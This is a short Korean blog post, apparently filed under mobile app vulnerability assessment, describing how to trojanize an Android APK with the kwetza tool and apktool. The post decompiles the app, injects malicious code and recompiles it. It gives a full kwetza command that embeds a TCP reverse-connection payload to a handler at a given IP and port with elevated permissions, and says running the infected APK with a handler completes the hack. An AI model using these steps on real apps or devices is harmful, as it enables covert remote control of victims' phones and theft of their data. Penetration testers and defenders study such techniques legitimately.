https://github.com/sensepost/kwetza
kwetza와 함께 apktool도 필요합니다.
apktool은 apk 파일을 디컴파일 및 컴파일 해주는 모듈인데
원리는 apktool 디컴파일로 apk를 까서 풀어놓은 뒤
그 파일 안에 악성코드를 집어넣은 뒤
다시 컴파일하는 방식입니다.
명령 - 앱파일을 kwetza 폴더 안에 넣은뒤
python kwetza.py 앱명.apk tcp 192.168.0.0 4444 yes[퍼미션 앱권한 설정] AssistActivity
퍼미션 yes시 기존 앱파일 권한보다 높은 권한을 얻는다.
완성된 감염 apk파일을 안드로이드 핸들러와 실행하면 해킹이 된다.
'4. 모바일 앱 취약점 진단 > Android' 카테고리의 다른 글
[Android] 1.2. 앱 무결성 검증 취약점 (0) | 2024.06.19 |
---|---|
[Android] 1.1. 소스코드 난독화 및 암호화 취약점 (0) | 2024.06.19 |
안드로이드 가상환경을 구축하기 - Genymotion, 블루스택, Nox (0) | 2023.12.28 |
Apktool을 활용 안드로이드 앱에 수동으로 악성코드 넣기 (0) | 2023.12.26 |
안드로이드 악성 코드 - AhMyth Android RAT 도구 (0) | 2023.12.26 |